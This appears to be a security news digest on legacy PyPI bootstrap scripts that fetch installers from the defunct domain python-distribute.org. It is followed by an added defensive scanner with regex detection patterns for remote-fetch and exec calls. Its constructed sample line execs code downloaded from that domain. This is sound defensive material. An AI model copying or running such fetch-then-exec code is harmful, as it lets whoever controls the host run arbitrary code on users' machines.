Legacy Python Bootstrap Scripts Pose Domain-Takeover Risk in PyPI Packages
Summary
Researchers discovered vulnerable legacy Python bootstrap scripts in multiple PyPI packages that could enable domain-takeover attacks. The scripts fetch installation files from a defunct domain (python-distribute.org), now available for purchase, potentially allowing attackers to serve malicious code. Affected packages include tornado, pypiserver, slapos.core, roman, xlutils, and testfixtures. While some packages have removed the vulnerable scripts, others like slapos.core still include them, posing a latent risk to users who might execute the scripts.
Timeline
- 28.11.2025 18:27 (1 article): Legacy Python Bootstrap Scripts Pose Domain-Takeover Risk in PyPI Packages
  Source: Legacy Python Bootstrap Scripts Create Domain-Takeover Risk in Multiple PyPI Packages — thehackernews.com — 28.11.2025 18:27
Information Snippets
All items below were first reported 28.11.2025 18:27 (1 source, 1 article: thehackernews.com).
- The vulnerability lies in bootstrap scripts used with the zc.buildout tool, which fetch installation scripts from the defunct domain python-distribute.org.
- The domain python-distribute.org has been up for sale since 2014, making it a potential target for domain takeover.
- Affected PyPI packages include tornado, pypiserver, slapos.core, roman, xlutils, and testfixtures.
- The bootstrap script is written in Python 2 and cannot be executed with Python 3 without modifications.
- The slapos.core package still includes the vulnerable bootstrap script, while the others have removed it.
- Separately, a malicious PyPI package named 'spellcheckers' was discovered; it installs a remote access trojan (RAT) and had been downloaded 955 times before it was removed.
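The practical question for a defender is whether any package or vendored checkout in their environment still carries a bootstrap script that pulls code from python-distribute.org and runs it. The scanner below is an added example written for this page, not code from the researchers or from any of the named packages: it walks a source tree, flags URLs whose host is the defunct domain named above, and also flags the generic "fetch over the network, then exec the result" shape that makes such scripts dangerous regardless of which host they point at. The sample bootstrap text embedded in it is constructed to resemble a legacy script and is not the real file; the hypothetical path `example_setup.py` is a placeholder.

```python
"""Find legacy bootstrap patterns that fetch and execute remote code.

Added defender's example; not part of the reported research or of any
affected package. Flags (a) references to the defunct python-distribute.org
domain named in the report and (b) the generic fetch-then-exec pattern.
"""
import re
from pathlib import Path

# Hosts known to be defunct / for sale. python-distribute.org comes from the
# report; extend the set from your own inventory.
DEFUNCT_HOSTS = {"python-distribute.org"}

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)[^\s'\"]*")
FETCH_RE = re.compile(r"\b(urlopen|urlretrieve|requests\.get)\s*\(")
EXEC_RE = re.compile(r"\b(exec|eval)\s*\(")


def _is_defunct(host):
    host = host.lower()
    return host in DEFUNCT_HOSTS or any(host.endswith("." + h) for h in DEFUNCT_HOSTS)


def scan_source(text, path="<string>"):
    """Return (path, line_no, kind, evidence) tuples for suspicious lines.

    kind is one of: 'defunct-domain', 'remote-fetch', 'dynamic-exec'.
    """
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for m in URL_RE.finditer(line):
            if _is_defunct(m.group(1)):
                findings.append((path, line_no, "defunct-domain", m.group(0)))
        if FETCH_RE.search(line):
            findings.append((path, line_no, "remote-fetch", line.strip()))
        if EXEC_RE.search(line):
            findings.append((path, line_no, "dynamic-exec", line.strip()))
    return findings


def scan_tree(root):
    """Scan every .py file under root (bootstrap.py included) and merge results."""
    findings = []
    for file in sorted(Path(root).rglob("*.py")):
        findings.extend(scan_source(file.read_text(errors="ignore"), str(file)))
    return findings


def summarize(findings):
    """Count findings per kind; a non-zero 'defunct-domain' count is the alarm."""
    counts = {"defunct-domain": 0, "remote-fetch": 0, "dynamic-exec": 0}
    for _, _, kind, _ in findings:
        counts[kind] += 1
    return counts


# Constructed sample resembling a Python 2 era bootstrap script (not the real
# file). The remote path 'example_setup.py' is a placeholder.
SAMPLE_BOOTSTRAP = "\n".join([
    "import urllib2",
    "from urllib2 import urlopen",
    'DISTRIBUTE_URL = "http://python-distribute.org/example_setup.py"',
    "exec(urlopen(DISTRIBUTE_URL).read())",
])

# Constructed clean sample: pins to the official index and executes nothing.
CLEAN_SAMPLE = "\n".join([
    'INDEX_URL = "https://pypi.org/simple"',
    "print(INDEX_URL)",
])


if __name__ == "__main__":
    for f in scan_source(SAMPLE_BOOTSTRAP, "sample/bootstrap.py"):
        print("%s:%d [%s] %s" % f)
    print(summarize(scan_source(SAMPLE_BOOTSTRAP)))
```

Run `scan_tree` against a site-packages directory or an unpacked sdist; any `defunct-domain` hit is actionable on its own, while `remote-fetch` paired with `dynamic-exec` on the same or adjacent lines is the pattern to review even when the host is still live, since the fix is to stop executing fetched code rather than to swap in a new host.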